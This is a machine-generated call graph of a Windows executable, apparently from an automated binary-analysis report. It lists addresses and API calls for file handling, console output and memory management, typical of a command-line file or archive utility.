26667->26669 26670 694078 memmove 26668->26670 26669->26670 26669->26689 26671 694098 26670->26671 26698 68c0fc 26671->26698 26674 663404 4 API calls 26675 6940c2 26674->26675 26676 663404 4 API calls 26675->26676 26677 6940d3 26676->26677 26713 693d58 26677->26713 26679 6940ee 26680 6940f8 26679->26680 26681 69447d 26679->26681 26683 662130 2 API calls 26680->26683 26682 69450b 26681->26682 26684 663404 4 API calls 26681->26684 26686 68419c 7 API calls 26682->26686 26685 694102 26683->26685 26687 6944e9 26684->26687 26688 69411c 26685->26688 26741 68caac malloc _CxxThrowException memmove 26685->26741 26686->26689 26690 663404 4 API calls 26687->26690 26693 66b8f0 4 API calls 26688->26693 26692 6944fa 26690->26692 26694 663404 4 API calls 26692->26694 26695 69412c 26693->26695 26694->26682 26696 68419c 7 API calls 26695->26696 26697 69413a 26696->26697 26699 663208 2 API calls 26698->26699 26700 68c157 26699->26700 26701 663208 2 API calls 26700->26701 26702 68c161 26701->26702 26703 663208 2 API calls 26702->26703 26704 68c194 26703->26704 26705 663208 2 API calls 26704->26705 26706 68c19e 26705->26706 26707 663208 2 API calls 26706->26707 26708 68c1ab 26707->26708 26709 663208 2 API calls 26708->26709 26710 68c1b8 26709->26710 26711 663208 2 API calls 26710->26711 26712 68c1c5 26711->26712 26712->26674 26714 693dc3 26713->26714 26715 693d86 26713->26715 26717 662130 2 API calls 26714->26717 26724 693d8e 26714->26724 26716 662130 2 API calls 26715->26716 26716->26724 26718 693dd4 26717->26718 26719 663404 4 API calls 26718->26719 26720 693e15 26719->26720 26743 6691dc 26720->26743 26723 693e2a GetLastError 26723->26724 26724->26679 26726 663208 2 API calls 26725->26726 26727 684140 memmove 26726->26727 26727->26639 26729 68c6dd 26728->26729 26877 66ae2c 26729->26877 26733 66b907 26732->26733 26734 66b945 free free 26732->26734 26735 662130 2 API calls 26733->26735 26739 68419c 7 API calls 26734->26739 26736 66b91b 26735->26736 26737 66b937 free 26736->26737 26738 66b924 memmove 26736->26738 26737->26734 26738->26737 26740 684206 memmove 26739->26740 26740->26667 26741->26688 26742->26659 26746 669164 26743->26746 26751 668cdc 26746->26751 26748 66918d 26763 668f18 12 API calls 26748->26763 26750 6691a5 26750->26723 26750->26724 26764 6689d8 26751->26764 26753 668d0d 26753->26748 26754 668d07 26754->26753 26755 668d36 CreateFileW 26754->26755 26756 668d5a 26754->26756 26755->26756 26756->26753 26757 663208 2 API calls 26756->26757 26758 668d6e 26757->26758 26767 66a7ec 26758->26767 26761 668d87 CreateFileW 26762 668dad free 26761->26762 26762->26753 26763->26750 26765 6689e7 CloseHandle 26764->26765 26766 6689f4 26764->26766 26765->26766 26766->26754 26772 66a224 26767->26772 26769 668d83 26769->26761 26769->26762 26771 66339c 4 API calls 26771->26769 26773 66a257 26772->26773 26774 66a25e 26772->26774 26773->26769 26773->26771 26774->26773 26775 66a363 26774->26775 26782 66a28c 26774->26782 26776 66a44b 26775->26776 26778 66a37c 26775->26778 26777 66a618 26776->26777 26779 66a461 26776->26779 26780 663274 3 API calls 26777->26780 26778->26779 26786 66a389 26778->26786 26781 663208 2 API calls 26779->26781 26783 66a626 26780->26783 26784 66a46b 26781->26784 26782->26773 26785 663274 3 API calls 26782->26785 26791 663274 3 API calls 26783->26791 26864 669f80 malloc _CxxThrowException free memmove GetCurrentDirectoryW 26784->26864 26788 66a2bb 26785->26788 26789 663274 3 API calls 26786->26789 26795 66a2de 26788->26795 26796 66a2cf free 26788->26796 26792 66a396 26789->26792 26790 66a476 26793 66a47a free 26790->26793 26804 66a48b 26790->26804 26794 66a644 26791->26794 26799 663274 3 API calls 26792->26799 26793->26773 26870 669fd8 memmove 26794->26870 26800 663274 3 API calls 26795->26800 26796->26773 26798 66a64f 26801 66a653 free free 26798->26801 26802 66a66c 26798->26802 26803 66a3c2 26799->26803 26805 66a2ec 26800->26805 26801->26773 26871 663670 malloc _CxxThrowException memmove free _CxxThrowException 26802->26871 26862 669fd8 memmove 26803->26862 26815 66a4ab 26804->26815 26825 66a4c6 26804->26825 26858 669fd8 memmove 26805->26858 26809 66a3cd 26813 66a3d1 free free 26809->26813 26814 66a3ed 26809->26814 26810 66a2f7 26811 66a2fb free free 26810->26811 26816 66a317 26810->26816 26811->26773 26812 66a67b 26817 66362c 6 API calls 26812->26817 26813->26773 26863 663670 malloc _CxxThrowException memmove free _CxxThrowException 26814->26863 26819 66a4b7 free 26815->26819 26820 66a4cf 26815->26820 26859 66362c 26816->26859 26822 66a69d 26817->26822 26819->26773 26827 663208 2 API calls 26820->26827 26826 66362c 6 API calls 26822->26826 26823 66a3fc 26833 66362c 6 API calls 26823->26833 26824 66a339 26829 66362c 6 API calls 26824->26829 26825->26820 26830 66a609 free 26825->26830 26831 66a502 26825->26831 26832 66a6aa free free 26826->26832 26828 66a538 26827->26828 26834 66a56b 26828->26834 26837 66a545 26828->26837 26835 66a346 free free 26829->26835 26830->26773 26831->26820 26842 66a518 free 26831->26842 26832->26773 26836 66a421 26833->26836 26838 66339c 4 API calls 26834->26838 26835->26773 26839 66362c 6 API calls 26836->26839 26865 6635d8 6 API calls 26837->26865 26841 66a569 26838->26841 26843 66a42e free free 26839->26843 26867 669fd8 memmove 26841->26867 26842->26773 26843->26773 26844 66a55c 26866 6635d8 6 API calls 26844->26866 26847 66a583 26848 66a587 free free 26847->26848 26849 66a5a3 26847->26849 26848->26773 26850 66a5b3 26849->26850 26868 663670 malloc _CxxThrowException memmove free _CxxThrowException 26849->26868 26869 669a80 malloc _CxxThrowException memmove 26850->26869 26853 66a5c8 26854 66362c 6 API calls 26853->26854 26855 66a5d4 free 26854->26855 26856 66362c 6 API calls 26855->26856 26857 66a5ec free free 26856->26857 26857->26773 26858->26810 26872 663004 26859->26872 26862->26809 26863->26823 26864->26790 26865->26844 26866->26841 26867->26847 26868->26850 26869->26853 26870->26798 26871->26812 26873 663016 26872->26873 26874 66302b memmove 26872->26874 26876 662ef4 malloc _CxxThrowException memmove free _CxxThrowException 26873->26876 26874->26824 26876->26874 26878 66ae36 26877->26878 26879 66ae3a 26877->26879 26878->26651 26878->26652 26881 66add0 VariantClear 26879->26881 26881->26878 26882 6ae1a6 26883 6ae1bd __set_app_type 26882->26883 26884 6ae201 26883->26884 26885 6ae20a __setusermatherr 26884->26885 26886 6ae217 _initterm __getmainargs _initterm 26884->26886 26885->26886 26887 6ae291 26886->26887 26888 6ae29b _cexit 26887->26888 26889 6ae2a3 26887->26889 26888->26889 26890 68f13e 26893 68f144 26890->26893 26891 66450c 3 API calls 26892 68f1cb 26891->26892 26894 663208 2 API calls 26892->26894 26893->26891 26895 68f1d6 26894->26895 26896 68f206 26895->26896 26897 66339c 4 API calls 26895->26897 26898 662130 2 API calls 26896->26898 26899 68f248 26896->26899 26897->26896 26898->26899 26935 6ac7d4 26899->26935 26902 68facb 26904 662130 2 API calls 26902->26904 26924 68faf9 26902->26924 26904->26924 26905 690028 free free free free 26908 692d6b free 26905->26908 26906 68fa6e free free free 26906->26908 26907 68fa90 26934 66c90c 3 API calls 26907->26934 26911 693702 26908->26911 26910 68faa2 26910->26902 26912 68faa9 free free free 26910->26912 26912->26908 26914 690034 free free free free 26914->26908 26915 69005f free free free free 26915->26908 26916 69008a free free free free 26916->26908 26918 6900c9 free free free free 26918->26908 26921 69010e free free free free 26921->26908 26923 690192 free free free free 26923->26908 26924->26905 26924->26914 26924->26915 26924->26916 26924->26918 26924->26921 26924->26923 26926 663404 malloc _CxxThrowException free memmove 26924->26926 26928 6901d4 free free free free 26924->26928 26930 690213 free free free free 26924->26930 26931 69014d free free free free 26924->26931 26948 68e0e8 26924->26948 26952 68b58c 6 API calls 26924->26952 26926->26924 26928->26908 26930->26908 26931->26908 26934->26910 26936 6ac7ea 26935->26936 26937 68f2c8 26935->26937 26938 662130 2 API calls 26936->26938 26937->26902 26942 66c90c 26937->26942 26939 6ac7fe 26938->26939 26940 6ac81a free 26939->26940 26941 6ac807 memmove 26939->26941 26940->26937 26941->26940 26943 66c920 26942->26943 26945 66c932 26942->26945 26943->26945 26953 668a60 26943->26953 26945->26906 26945->26907 26947 66c995 GetLastError 26947->26945 26951 68e110 26948->26951 26949 68e120 26949->26924 26951->26949 26958 695988 22 API calls 26951->26958 26952->26924 26954 668a83 SetFilePointer 26953->26954 26955 668a70 26953->26955 26956 668aa6 GetLastError 26954->26956 26957 668ab0 26954->26957 26955->26954 26956->26957 26957->26945 26957->26947 26958->26949 26959 6a9b5d 26960 6a9b79 26959->26960 26961 6a9b61 fputs 26959->26961 27117 6a057c 26960->27117 27116 662300 fputc 26961->27116 26965 663208 2 API calls 26966 6a9bc5 26965->26966 27121 6838e8 26966->27121 26975 6a9c61 26976 662130 malloc _CxxThrowException 26975->26976 26977 6a9c7d 26976->26977 26978 6a7414 malloc _CxxThrowException 26977->26978 26981 6a9c95 26977->26981 26978->26981 26979 663404 malloc _CxxThrowException free memmove 26980 6a9cd5 26979->26980 26982 6a71ec malloc _CxxThrowException 26980->26982 26981->26979 26983 6a9d90 26982->26983 26984 663404 malloc _CxxThrowException free memmove 26983->26984 26985 6a9dee 26984->26985 26986 66ef70 8 API calls 26985->26986 26987 6a9e63 26986->26987 26988 663208 malloc _CxxThrowException 26987->26988 26989 6a9e70 26988->26989 26990 686be0 malloc _CxxThrowException 26989->26990 26991 6a9e7e 26990->26991 26992 6a9ed2 26991->26992 26994 686e08 84 API calls 26991->26994 26993 685458 417 API calls 26992->26993 26995 6a9f49 26993->26995 26996 6a9eb1 26994->26996 26998 6a9f60 26995->26998 26999 6ab1c8 7 API calls 26995->26999 26996->26992 26997 6a9eb6 _CxxThrowException 26996->26997 26997->26992 27000 6a9fb1 26998->27000 27003 662300 fputc 26998->27003 26999->26998 27001 6aa02c 27000->27001 27002 662300 fputc 27000->27002 27004 6aa063 27001->27004 27008 6aa03c fputs 27001->27008 27005 6a9fd4 27002->27005 27007 6a9f86 fputs 27003->27007 27006 6aa09e 27004->27006 27011 6aa077 fputs 27004->27011 27012 6aa114 27004->27012 27005->27001 27010 6a9fde fputs 27005->27010 27006->27012 27017 6aa0ac fputs 27006->27017 27018 6aa0d3 27006->27018 27013 662300 fputc 27007->27013 27009 6626a0 fputs 27008->27009 27014 6aa05b 27009->27014 27015 6626a0 fputs 27010->27015 27016 6626a0 fputs 27011->27016 27029 662300 fputc 27012->27029 27034 6aa15c 27012->27034 27019 6a9f9e 27013->27019 27020 662300 fputc 27014->27020 27021 6a9ffd 27015->27021 27022 6aa096 27016->27022 27023 6626a0 fputs 27017->27023 27018->27012 27025 662300 fputc 27018->27025 27024 662320 14 API calls 27019->27024 27020->27004 27027 662300 fputc 27021->27027 27028 662300 fputc 27022->27028 27030 6aa0cb 27023->27030 27031 6a9fa9 27024->27031 27032 6aa0e4 27025->27032 27026 6aa320 free free 27033 686b58 free free 27026->27033 27036 6aa005 fputs 27027->27036 27028->27006 27037 6aa12c 27029->27037 27038 662300 fputc 27030->27038 27039 662300 fputc 27031->27039 27032->27012 27040 6aa0ed fputs 27032->27040 27041 6aa347 free 27033->27041 27034->27026 27035 6aa2e7 27034->27035 27042 6aa18f 27034->27042 27044 662300 fputc 27035->27044 27043 6626a0 fputs 27036->27043 27037->27034 27045 6aa135 fputs 27037->27045 27038->27018 27039->27000 27046 6626a0 fputs 27040->27046 27047 6a7968 free free free free 27041->27047 27042->27026 27052 6aa1cd 27042->27052 27053 6aa1a5 fputs 27042->27053 27048 6aa024 27043->27048 27049 6aa2ef 27044->27049 27050 6626a0 fputs 27045->27050 27051 6aa10c 27046->27051 27071 6aa363 27047->27071 27054 662300 fputc 27048->27054 27049->27026 27055 6aa2f8 fputs 27049->27055 27056 6aa154 27050->27056 27057 662300 fputc 27051->27057 27059 6aa1f3 fputs 27052->27059 27068 6aa275 fputs 27052->27068 27058 6626a0 fputs 27053->27058 27054->27001 27060 6626a0 fputs 27055->27060 27061 662300 fputc 27056->27061 27057->27012 27063 6aa1c5 27058->27063 27062 6626a0 fputs 27059->27062 27064 6aa317 27060->27064 27061->27034 27066 6aa213 27062->27066 27067 662300 fputc 27063->27067 27065 662300 fputc 27064->27065 27069 6aa2e5 27065->27069 27070 662300 fputc 27066->27070 27067->27052 27073 6626a0 fputs 27068->27073 27069->27026 27074 6aa21b 27070->27074 27072 6aa53d free 27071->27072 27079 6aa528 free free 27071->27079 27075 6aa55b 27072->27075 27076 6aa58c free 27072->27076 27077 6aa295 27073->27077 27074->27068 27078 6aa225 fputs 27074->27078 27075->27076 27084 6aa577 free free 27075->27084 27080 6aa5ad 27076->27080 27081 662300 fputc 27077->27081 27083 6626a0 fputs 27078->27083 27079->27071 27085 6aa5c5 27080->27085 27086 6aa5c0 27080->27086 27082 6aa2a0 fputs 27081->27082 27087 6626a0 fputs 27082->27087 27090 6aa245 27083->27090 27084->27075 27088 6aa5ca _CxxThrowException 27085->27088 27089 6aa5e7 free 27085->27089 27091 6a66a8 30 API calls 27086->27091 27092 6aa2c0 27087->27092 27088->27089 27093 6aa626 free 27089->27093 27094 6aa605 27089->27094 27095 662300 fputc 27090->27095 27091->27085 27096 662300 fputc 27092->27096 27098 6aa63c 27093->27098 27097 6aa609 free 27094->27097 27099 6aa24d fputs 27095->27099 27100 6aa2c8 27096->27100 27097->27093 27097->27097 27102 6a7080 6 API calls 27098->27102 27101 6626a0 fputs 27099->27101 27100->27026 27104 662300 fputc 27100->27104 27103 6aa26d 27101->27103 27105 6aa64a 27102->27105 27106 662300 fputc 27103->27106 27107 6aa2d5 27104->27107 27108 66182c free free free free free 27105->27108 27106->27068 27109 6a291c 11 API calls 27107->27109 27110 6aa658 27108->27110 27109->27069 27111 6a7f50 61 API calls 27110->27111 27112 6aa666 27111->27112 27113 6aa6a8 free 27112->27113 27115 6aa693 free free 27112->27115 27114 6aa6b8 27113->27114 27115->27112 27116->26960 27118 6a059a 27117->27118 27119 6a058a 27117->27119 27118->26965 27180 662c78 malloc _CxxThrowException free 27119->27180 27181 681700 27121->27181 27126 683979 27194 683864 13 API calls 27126->27194 27128 683a27 27199 683864 13 API calls 27128->27199 27136 662130 2 API calls 27141 683992 27136->27141 27141->27128 27141->27136 27146 66b8f0 4 API calls 27141->27146 27195 6809e0 6 API calls 27141->27195 27196 663314 27141->27196 27147 683a0b free 27146->27147 27147->27141 27180->27118 27200 671d04 GetCurrentProcess 27181->27200 27184 68373c 27191 68376d 27184->27191 27193 683819 27184->27193 27186 683828 27323 680c24 98 API calls 27186->27323 27187 681678 malloc _CxxThrowException memmove memmove free 27187->27191 27189 68381b memmove 27189->27126 27189->27141 27191->27187 27191->27193 27210 6824c0 27191->27210 27322 680a58 10 API calls 27193->27322 27195->27141 27197 662fbc 2 API calls 27196->27197 27198 663329 memmove 27197->27198 27198->27141 27201 671d25 CloseHandle 27200->27201 27202 671d3b OpenProcessToken 27200->27202 27201->27202 27203 671d52 LookupPrivilegeValueW 27202->27203 27204 671d9d 27202->27204 27203->27204 27205 671d7f AdjustTokenPrivileges 27203->27205 27207 671da7 CloseHandle 27204->27207 27209 671dad 27204->27209 27205->27204 27206 671db1 GetLastError 27205->27206 27208 671dc6 CloseHandle 27206->27208 27206->27209 27207->27209 27208->27209 27209->27184 27211 682508 27210->27211 27324 6800bc 27211->27324 27213 683484 free 27213->27189 27213->27191 27214 6832fd 27215 663208 2 API calls 27214->27215 27216 683316 27215->27216 27431 667df4 27216->27431 27218 683002 27223 683059 free 27218->27223 27219 682529 27219->27213 27231 68306a 27219->27231 27319 682592 27219->27319 27220 6830f6 27429 66881c 14 API calls 27220->27429 27222 683327 27227 663208 2 API calls 27222->27227 27223->27213 27225 68320f 27228 68326b 27225->27228 27233 6832d6 free free 27225->27233 27226 66318c 4 API calls 27290 682bfc 27226->27290 27232 683343 27227->27232 27230 6832ec free 27228->27230 27229 663314 3 API calls 27270 683119 27229->27270 27230->27213 27231->27214 27231->27220 27434 667e80 41 API calls 27232->27434 27233->27225 27234 663208 2 API calls 27234->27319 27237 663208 2 API calls 27237->27290 27238 68326d free 27238->27228 27239 683282 27238->27239 27239->27228 27246 68329b free free 27239->27246 27241 68342c 27437 680084 GetLastError 27241->27437 27242 68345c free 27245 68346a free 27242->27245 27244 683437 27247 68344d free 27244->27247 27248 68343d free 27244->27248 27438 66794c 27245->27438 27246->27239 27247->27245 27256 683496 free 27248->27256 27249 6800f0 8 API calls 27249->27290 27251 663208 2 API calls 27251->27270 27252 663404 4 API calls 27252->27319 27259 66794c FindClose 27256->27259 27257 663404 4 API calls 27257->27290 27258 6800bc 30 API calls 27268 683361 27258->27268 27259->27213 27260 663404 4 API calls 27260->27270 27261 6833dd free 27261->27268 27262 6834b4 free free 27264 66794c FindClose 27262->27264 27263 667ebc 90 API calls 27263->27290 27264->27213 27266 683488 free 27266->27256 27268->27241 27268->27242 27268->27258 27268->27261 27268->27262 27268->27266 27273 663208 2 API calls 27268->27273 27435 681db4 319 API calls 27268->27435 27436 667e80 41 API calls 27268->27436 27270->27225 27270->27229 27270->27238 27270->27251 27270->27260 27274 6831e3 free free 27270->27274 27275 683214 free free 27270->27275 27430 681db4 319 API calls 27270->27430 27271 682c0a free free 27271->27223 27272 6826dc free free 27272->27319 27273->27268 27274->27225 27274->27270 27275->27230 27279 68323d 27275->27279 27276 682fa8 free 27277 68303a free free 27276->27277 27278 682fba free free 27276->27278 27277->27223 27278->27290 27279->27228 27287 683256 free free 27279->27287 27281 682c28 free free 27281->27223 27282 682747 free free 27282->27319 27283 682f94 free free 27283->27290 27284 663314 malloc _CxxThrowException memmove 27284->27319 27285 682e66 free free 27285->27290 27287->27279 27288 682efb free free 27288->27290 27289 68301f free free 27289->27223 27290->27218 27290->27226 27290->27237 27290->27249 27290->27257 27290->27263 27290->27276 27290->27283 27290->27285 27290->27288 27290->27289 27292 682e9e free free 27290->27292 27293 683004 free free 27290->27293 27426 663348 malloc _CxxThrowException free 27290->27426 27427 680084 GetLastError 27290->27427 27428 681890 319 API calls 27290->27428 27292->27290 27293->27223 27294 682810 free free free 27294->27319 27295 68287a free 27295->27319 27296 6827fc free free 27296->27319 27297 682866 free free 27297->27319 27300 682c46 free free 27300->27223 27302 682c64 free free 27302->27223 27303 682949 free free 27303->27319 27304 682a64 free free 27304->27319 27305 662130 malloc _CxxThrowException 27305->27319 27310 66b8f0 malloc _CxxThrowException memmove free 27310->27319 27311 682ce2 27312 682d21 free free free 27311->27312 27317 682d0d free free 27311->27317 27312->27223 27313 682ba0 free free free 27313->27319 27314 682c82 27316 682cb8 free free free 27314->27316 27320 682ca4 free free 27314->27320 27315 682a4f free 27315->27319 27316->27223 27317->27311 27318 682b8c free free 27318->27319 27319->27234 27319->27252 27319->27271 27319->27272 27319->27281 27319->27282 27319->27284 27319->27290 27319->27294 27319->27295 27319->27296 27319->27297 27319->27300 27319->27302 27319->27303 27319->27304 27319->27305 27319->27310 27319->27311 27319->27313 27319->27314 27319->27315 27319->27318 27321 682a33 free free 27319->27321 27328 66318c 27319->27328 27331 6800f0 27319->27331 27337 667ebc 27319->27337 27416 663348 malloc _CxxThrowException free 27319->27416 27417 680084 GetLastError 27319->27417 27418 6650bc 11 API calls 27319->27418 27419 6803bc 14 API calls 27319->27419 27420 6814dc 12 API calls 27319->27420 27421 680554 59 API calls 27319->27421 27422 681988 87 API calls 27319->27422 27423 6647a8 CharUpperW CharUpperW wcscmp 27319->27423 27424 67710c malloc _CxxThrowException memmove free 27319->27424 27425 681890 319 API calls 27319->27425 27320->27314 27321->27319 27322->27186 27323->27189 27325 6800d0 27324->27325 27326 6800e4 27324->27326 27441 6a05a0 27325->27441 27326->27219 27447 66312c 27328->27447 27330 6631b4 27330->27319 27332 663314 3 API calls 27331->27332 27333 68010f 27332->27333 27334 66362c 6 API calls 27333->27334 27335 68011d 27334->27335 27336 680182 free 27335->27336 27336->27319 27338 667edf 27337->27338 27339 667ee9 27338->27339 27341 667fca 27338->27341 27340 66339c 4 API calls 27339->27340 27343 667f14 27340->27343 27344 663274 3 API calls 27341->27344 27345 668253 27341->27345 27342 667f8c 27348 6691dc 51 API calls 27342->27348 27343->27342 27346 667f2e 27343->27346 27347 667ff9 27344->27347 27352 668306 27345->27352 27354 668296 27345->27354 27464 66abb0 GetModuleHandleW GetProcAddress GetDiskFreeSpaceW 27346->27464 27350 663274 3 API calls 27347->27350 27351 667fa2 27348->27351 27365 668007 27350->27365 27359 6689d8 CloseHandle 27351->27359 27356 66831e 27352->27356 27360 668326 27352->27360 27375 668377 27352->27375 27353 667f75 27353->27342 27355 667f79 27353->27355 27469 667d4c 27354->27469 27358 667fc3 27355->27358 27362 667d4c 39 API calls 27356->27362 27358->27319 27359->27358 27371 6682e7 27360->27371 27450 667978 27360->27450 27362->27360 27369 668051 27365->27369 27465 663670 malloc _CxxThrowException memmove free _CxxThrowException 27365->27465 27366 6682b8 27367 66339c 4 API calls 27366->27367 27367->27371 27368 66794c FindClose 27368->27358 27370 6680b1 27369->27370 27372 668075 27369->27372 27373 667ebc 72 API calls 27370->27373 27371->27368 27374 6680af 27372->27374 27377 663404 4 API calls 27372->27377 27376 6680b9 27373->27376 27380 663314 3 API calls 27374->27380 27375->27360 27378 663274 3 API calls 27375->27378 27376->27374 27379 66823e free free 27376->27379 27377->27374 27385 6683b9 27378->27385 27379->27345 27381 6680e3 27380->27381 27382 663208 2 API calls 27381->27382 27383 6680ee 27382->27383 27466 667ce0 44 API calls 27383->27466 27386 667978 39 API calls 27385->27386 27387 668435 27386->27387 27389 66847c 27387->27389 27390 668439 wcscmp 27387->27390 27388 66815a free free 27393 66794c FindClose 27388->27393 27394 667d4c 39 API calls 27389->27394 27390->27389 27392 668459 27390->27392 27391 66818a SetLastError free free 27397 66794c FindClose 27391->27397 27399 66339c 4 API calls 27392->27399 27395 668179 free 27393->27395 27396 66848c 27394->27396 27400 66822d free 27395->27400 27401 6684b3 27396->27401 27404 6684a7 free 27396->27404 27402 6681b5 free 27397->27402 27403 66846b free 27399->27403 27400->27358 27405 66339c 4 API calls 27401->27405 27402->27400 27403->27371 27404->27360 27408 6684e4 free 27405->27408 27406 6681c3 27410 66362c 6 API calls 27406->27410 27407 66812a free 27409 663208 2 API calls 27407->27409 27408->27371 27411 668106 27409->27411 27412 6681ee free free 27410->27412 27411->27388 27411->27391 27411->27406 27411->27407 27467 662748 CharUpperW CharUpperW 27411->27467 27468 667ce0 44 API calls 27411->27468 27414 66794c FindClose 27412->27414 27415 66821e free 27414->27415 27415->27400 27416->27319 27417->27319 27418->27319 27419->27319 27420->27319 27421->27319 27422->27319 27423->27319 27424->27319 27425->27319 27426->27290 27427->27290 27428->27290 27429->27270 27430->27270 27432 663404 4 API calls 27431->27432 27433 667e06 27432->27433 27433->27222 27434->27268 27435->27268 27436->27268 27437->27244 27439 667968 27438->27439 27440 66795b FindClose 27438->27440 27439->27213 27440->27439 27442 6a05de 27441->27442 27443 6a05b0 27441->27443 27442->27326 27444 663404 4 API calls 27443->27444 27445 6a05d6 27444->27445 27446 6ab480 30 API calls 27445->27446 27446->27442 27448 662fbc 2 API calls 27447->27448 27449 663154 memmove memmove 27448->27449 27449->27330 27451 66794c FindClose 27450->27451 27452 66799b 27451->27452 27453 6679b2 FindFirstFileW 27452->27453 27455 6679c3 27452->27455 27458 667a13 27452->27458 27453->27455 27454 667a0d 27456 66339c 4 API calls 27454->27456 27454->27458 27455->27454 27457 663208 2 API calls 27455->27457 27456->27458 27459 6679d7 27457->27459 27458->27371 27460 66a7ec 35 API calls 27459->27460 27461 6679ec 27460->27461 27462 667a03 free 27461->27462 27463 6679f0 FindFirstFileW 27461->27463 27462->27454 27463->27462 27464->27353 27465->27369 27466->27411 27467->27411 27468->27411 27470 667d64 27469->27470 27471 667d6b GetFileAttributesW 27470->27471 27472 667d79 27470->27472 27471->27472 27473 667dc5 27471->27473 27472->27473 27474 663208 2 API calls 27472->27474 27473->27360 27473->27366 27475 667d87 27474->27475 27476 66a7ec 35 API calls 27475->27476 27477 667d9c 27476->27477 27478 667da0 GetFileAttributesW free 27477->27478 27479 667dbb free 27477->27479 27478->27473 27479->27473 27521 6949b0 27541 68cd8c 27521->27541 27523 663208 2 API calls 27525 6949e7 27523->27525 27526 663208 2 API calls 27525->27526 27527 6949f2 27526->27527 27529 694a25 27527->27529 27548 666e30 27527->27548 27532 694a57 free free 27529->27532 27539 694a72 27529->27539 27533 694b22 27532->27533 27534 694b0a free free 27534->27533 27535 66318c 4 API calls 27535->27539 27536 662130 2 API calls 27536->27539 27537 663314 3 API calls 27537->27539 27538 66b8f0 4 API calls 27540 694ade free 27538->27540 27539->27534 27539->27535 27539->27536 27539->27537 27539->27538 27540->27539 27542 663208 2 API calls 27541->27542 27543 68cddd 27542->27543 27544 663208 2 API calls 27543->27544 27545 68cdf0 27544->27545 27546 663208 2 API calls 27545->27546 27547 68cdfe 27546->27547 27547->27523 27549 666e47 27548->27549 27550 666e59 27549->27550 27551 66339c 4 API calls 27549->27551 27552 66339c 4 API calls 27550->27552 27551->27550 27553 666e73 27552->27553 27554 68cf80 27553->27554 27555 663404 4 API calls 27554->27555 27556 68cfa1 27555->27556 27557 66318c 4 API calls 27556->27557 27558 68cfb2 27557->27558 27559 667ebc 90 API calls 27558->27559 27560 68cfbf free 27559->27560 27561 68cfd2 _CxxThrowException 27560->27561 27564 68cfec 27560->27564 27561->27564 27562 68d02a 27562->27529 27563 68d015 free free 27563->27564 27564->27562 27564->27563 27565 66e8fc 27566 66e95b 27565->27566 27567 66e91f 27565->27567 27567->27566 27569 66ce1c 27567->27569 27577 66ce3c 27569->27577 27570 66cfdc 27572 66d020 GetLastError 27570->27572 27573 66ce69 27570->27573 27571 66cf96 27571->27573 27574 66cfa2 memmove 27571->27574 27572->27573 27573->27567 27574->27573 27575 66cf63 27575->27570 27582 668a60 2 API calls 27575->27582 27576 668a60 2 API calls 27576->27577 27577->27570 27577->27571 27577->27573 27577->27575 27577->27576 27578 66cf1e 27577->27578 27579 66cf85 GetLastError 27577->27579 27585 668af4 ReadFile 27577->27585 27578->27577 27584 66d019 27578->27584 27586 6ad480 VirtualAlloc 27578->27586 27579->27573 27583 66cf81 27582->27583 27583->27570 27583->27579 27584->27573 27585->27577 27586->27578 27587 66f71c 27622 661610 27587->27622 27590 66f774 _isatty _isatty _isatty 27597 66f7c4 27590->27597 27592 66f762 _CxxThrowException 27592->27590 27593 66f89f 27637 66ac74 GetCurrentProcess OpenProcessToken 27593->27637 27596 66ac74 6 API calls 27598 66f936 27596->27598 27597->27593 27644 6802a0 6 API calls 27597->27644 27600 66f9dd 27598->27600 27602 66f965 wcscmp 27598->27602 27603 66f95e 27598->27603 27604 66fa94 27600->27604 27607 662bc8 2 API calls 27600->27607 27601 66f8d4 _CxxThrowException 27601->27593 27602->27603 27605 66f979 27602->27605 27646 66ad0c GetModuleHandleW GetProcAddress 27603->27646 27605->27603 27610 66f98e 27605->27610 27609 66fa0a 27607->27609 27608 66f9c0 27608->27600 27647 6ad4c0 GetModuleHandleW GetProcAddress 27608->27647 27648 662d34 malloc _CxxThrowException free 27609->27648 27645 6802a0 6 API calls 27610->27645 27614 66f9c9 27617 66ac74 6 API calls 27614->27617 27615 66f9a2 _CxxThrowException 27615->27603 27620 66f9d7 27617->27620 27618 66fa18 27621 66fa75 GetCurrentProcess SetProcessAffinityMask free 27618->27621 27649 6802a0 6 API calls 27618->27649 27619 66fa63 _CxxThrowException 27619->27621 27620->27600 27621->27604 27623 661667 27622->27623 27624 661693 27622->27624 27623->27624 27627 66167f free free 27623->27627 27625 6616c9 27624->27625 27628 6616c1 free 27624->27628 27626 662130 2 API calls 27625->27626 27631 6616e1 27626->27631 27627->27623 27628->27625 27629 6617bd 27629->27590 27643 6802a0 6 API calls 27629->27643 27630 662130 2 API calls 27630->27631 27631->27629 27631->27630 27632 663314 3 API calls 27631->27632 27633 66b8f0 4 API calls 27631->27633 27635 6617bf 27631->27635 27650 661364 8 API calls 27631->27650 27632->27631 27633->27631 27636 663404 4 API calls 27635->27636 27636->27629 27638 66ad00 27637->27638 27639 66ac9f LookupPrivilegeValueW 27637->27639 27638->27596 27640 66acf5 CloseHandle 27639->27640 27641 66acb3 AdjustTokenPrivileges 27639->27641 27640->27638 27641->27640 27642 66acea GetLastError 27641->27642 27642->27640 27643->27592 27644->27601 27645->27615 27646->27608 27647->27614 27648->27618 27649->27619 27650->27631 27651 67251c 27653 67255c 27651->27653 27657 672543 27651->27657 27659 6723ec 27653->27659 27654 672691 27654->27657 27669 68c59c 27654->27669 27656 6725c5 27656->27654 27656->27657 27658 672662 SetFileSecurityW 27656->27658 27658->27654 27660 672408 27659->27660 27668 672401 27659->27668 27679 668bb0 SetFileTime 27660->27679 27662 672489 27663 6724d2 27662->27663 27685 668c98 27662->27685 27680 66cb34 27663->27680 27668->27656 27670 68c5e9 27669->27670 27671 68c655 27670->27671 27676 68c5fa 27670->27676 27678 68c5ef 27670->27678 27672 66ae2c VariantClear 27671->27672 27674 68c61b 27672->27674 27673 66ae2c VariantClear 27673->27674 27674->27657 27675 68c61f 27677 66ae2c VariantClear 27675->27677 27676->27675 27676->27678 27677->27674 27678->27673 27679->27662 27681 6689d8 CloseHandle 27680->27681 27682 66cb43 27681->27682 27683 66cb49 GetLastError 27682->27683 27684 66cb56 27682->27684 27683->27684 27684->27668 27686 668a60 2 API calls 27685->27686 27687 668cb3 27686->27687 27688 668cc0 27687->27688 27689 668cc4 SetEndOfFile 27687->27689 27688->27663 27690 67211c 13 API calls 27688->27690 27689->27688 27690->27663 27691 689a34 27692 689a9e 27691->27692 27693 689a54 27691->27693 27693->27692 27694 689a80 free 27693->27694 27697 666464 27694->27697 27698 66647f free 27697->27698 27699 666475 FreeLibrary 27697->27699 27698->27693 